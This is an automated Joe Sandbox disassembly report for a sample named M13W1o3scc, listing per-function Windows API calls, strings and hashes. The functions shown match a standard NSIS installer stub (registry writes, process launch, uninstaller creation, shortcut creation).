Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

Process32FirstW, xrefs: 004065BD
GetModuleBaseNameW, xrefs: 00406494
Unknown, xrefs: 004064FC
PSAPI.DLL, xrefs: 00406464
Kernel32.DLL, xrefs: 0040659B
EnumProcesses, xrefs: 00406482
CreateToolhelp32Snapshot, xrefs: 004065B5
EnumProcessModules, xrefs: 0040648A
Module32FirstW, xrefs: 004065D3
Module32NextW, xrefs: 004065DE
Process32NextW, xrefs: 004065C8

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

N, xrefs: 0040426C
@%F, xrefs: 004042A7
open, xrefs: 004042DF

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

F, xrefs: 00406AE8
NUL, xrefs: 00406A9E
%s=%s, xrefs: 00406B43
[Rename], xrefs: 00406BC8, 00406BD7

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error creating key "%s\%s", xrefs: 004029F5

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not load %s, xrefs: 004024DB
Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: %s not found in %s, xrefs: 0040249A

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
API String ID: 1033533793-945480824
Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: command="%s", xrefs: 00402241
Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: success ("%s"), xrefs: 00402263

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
